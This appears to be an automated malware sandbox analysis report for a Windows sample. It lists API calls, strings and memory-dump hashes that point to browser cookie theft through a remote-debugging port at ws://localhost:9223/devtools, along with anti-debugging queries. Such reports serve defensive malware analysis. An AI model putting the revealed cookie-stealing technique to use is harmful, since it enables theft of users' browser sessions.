                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                        • API String ID: 1974802433-1173974218
                                                                                                                                                                        • Opcode ID: 66cf4e571d804ee6e0b28a755787aa4ac6b1c9a70ff206e4b3eece8f915c2c00
                                                                                                                                                                        • Instruction ID: 12eed72317dc454678696c1a9da4bf9d2361ea3ee6819fa8f48d5a9846f5a7ce
                                                                                                                                                                        • Opcode Fuzzy Hash: 66cf4e571d804ee6e0b28a755787aa4ac6b1c9a70ff206e4b3eece8f915c2c00
                                                                                                                                                                        • Instruction Fuzzy Hash: 74216A7A601504AFC300EF9DDD94E9D77A5BF88710B040028E816D7369EAB0FE16CB99
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0041FC8A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BinaryCryptString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 80407269-0
                                                                                                                                                                        • Opcode ID: 0418850739d7626781930600f170e8330271ee7d840b16371d054fb9262e1749
                                                                                                                                                                        • Instruction ID: 62de5bec956a169481a5778194fdf1df57051168b430666ee5781268b5f467f0
                                                                                                                                                                        • Opcode Fuzzy Hash: 0418850739d7626781930600f170e8330271ee7d840b16371d054fb9262e1749
                                                                                                                                                                        • Instruction Fuzzy Hash: 60F0B475108605BFD3009F26DC85DAB73ADEB88784B110029F9468B391EBB4BC008B65
                                                                                                                                                                        APIs
                                                                                                                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000007,?,00000004,00000000), ref: 0040164E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationProcessQuery
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1778838933-0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcatA.KERNEL32(?,Cookies), ref: 0041C8FB
                                                                                                                                                                        • lstrcatA.KERNEL32(?,0067CC49), ref: 0041C92E
                                                                                                                                                                        • lstrcatA.KERNEL32(?,0067CC4C), ref: 0041C979
                                                                                                                                                                        • lstrcatA.KERNEL32(?,.txt), ref: 0041C9C4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: lstrcat
• String ID: .txt$Cookies
• API String ID: 4038537762-474470879
APIs
• memset.MSVCRT ref: 0041F88A
• lstrcatA.KERNEL32(?,00000000), ref: 0041F8B3
• lstrcatA.KERNEL32(?,00000000), ref: 0041F8D1
• lstrcatA.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 0041F904
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: lstrcat$memset
• String ID: --remote-debugging-port=9223 --profile-directory="$ 0
• API String ID: 2788080104-1375269121
APIs
• lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436C91
• lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436CF2
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: lstrcpy
• String ID:
• API String ID: 3722407311-0
APIs
• lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436C91
• lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436CF2
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: lstrcpy
• String ID:
• API String ID: 3722407311-0
APIs
• GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00442CA8
• GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00442CF1
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc
                                                                                                                                                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                                                                                                                                                        • API String ID: 190572456-1775429166
                                                                                                                                                                        • Opcode ID: fabe7de7e6f85eda5daa03ada1acf9803514b4439227e1eaed320f7146cb866f
                                                                                                                                                                        • Instruction ID: 99a9e5799e649aa26cca8c53ff1b95307459894a29596d3904e707583eccb788
                                                                                                                                                                        • Opcode Fuzzy Hash: fabe7de7e6f85eda5daa03ada1acf9803514b4439227e1eaed320f7146cb866f
                                                                                                                                                                        • Instruction Fuzzy Hash: 5A516EB9681141AFCB86DF54EC99811BBBABB4C35431600ADE9758B370F7F1AC08DB19
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: memset
• String ID: /devtools$localhost$ws://localhost:9223
• API String ID: 2221118986-2676143373
• Opcode ID: a5bc6d2918a5f7fd23756f2bb3c9a5397500d935ddbf7d4f28cbaec1daba04e9
• Instruction ID: 0dc4e084bfb38d858107b4969df691fc809c4bc6fe7224c3fbc1b472bd57c37f
• Opcode Fuzzy Hash: a5bc6d2918a5f7fd23756f2bb3c9a5397500d935ddbf7d4f28cbaec1daba04e9
• Instruction Fuzzy Hash: 89319AB2700150AFC704DB59DCD1EBE37AEEBC871470C4029E40AD3366FAB4A959C759
APIs
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F238
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: CopyFile
• String ID: 0$ 0
• API String ID: 1304948518-2612948726
• Opcode ID: 182b144e17410a3ae3358526937ac22c55c4e6a603f1a8a0435f62c1452c1eb3
• Instruction ID: de3a1f93126c12deb6ed219e4da2e682fdb512e8e31929a1438dbe72cb210f2e
• Opcode Fuzzy Hash: 182b144e17410a3ae3358526937ac22c55c4e6a603f1a8a0435f62c1452c1eb3
• Instruction Fuzzy Hash: 4F316D76B000509FCB45DF9CDCE0EDD73F1AF89704B0801B9E50AE3361EA70AA198B5A
APIs
• OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 0043D262
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: EventOpen
• String ID: -E~$z0_
• API String ID: 3658969616-3497079166
• Opcode ID: b9d1dcb91cfdc4d3c903aed4f4a19ee964a2ddc1ca2cde159e736153247c2ec8
• Instruction ID: 4c960738fd572624f98c33cf1521ed59ac4ed7dc924c0bf984625c0e848ba6ca
• Opcode Fuzzy Hash: b9d1dcb91cfdc4d3c903aed4f4a19ee964a2ddc1ca2cde159e736153247c2ec8
• Instruction Fuzzy Hash: 2A216F727012149FC794DF9DDC91FA973B9AF88604B0441BDE809D3351EEB0AE898B5A
APIs
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F238
Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                        • String ID: 0$ 0
                                                                                                                                                                        • API String ID: 1304948518-2612948726
                                                                                                                                                                        • Opcode ID: df052aac11e301a021650c70e2375969a0f3c96d4bf947737d91edd22a595e1f
                                                                                                                                                                        • Instruction ID: 46ca0ec3ac5e7fe645135cbb6742112b101b88f065de0e8023397726ea1268d6
                                                                                                                                                                        • Opcode Fuzzy Hash: df052aac11e301a021650c70e2375969a0f3c96d4bf947737d91edd22a595e1f
                                                                                                                                                                        • Instruction Fuzzy Hash: F4018C3AB40100AFD744DF68DD91E4833E69BCA200B1906B9ED05D33A1E5B0AC458B56
                                                                                                                                                                        APIs
                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,Network), ref: 0041ED6E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 0$Network
                                                                                                                                                                        • API String ID: 0-350251746
                                                                                                                                                                        • Opcode ID: c2fb731ace9cead62e1cda8bb610104f77ef50a826361aad85745bc2f7790bb3
                                                                                                                                                                        • Instruction ID: f80f0783777fa5cc836e735bdae024c9e7f2125abd3eb6355b1fadc9e12c604f
                                                                                                                                                                        • Opcode Fuzzy Hash: c2fb731ace9cead62e1cda8bb610104f77ef50a826361aad85745bc2f7790bb3
                                                                                                                                                                        • Instruction Fuzzy Hash: F4E04F7960020ADFC708DF24DEA4994B3BAFFC6248B094564DD099B235E7B1BC46CB55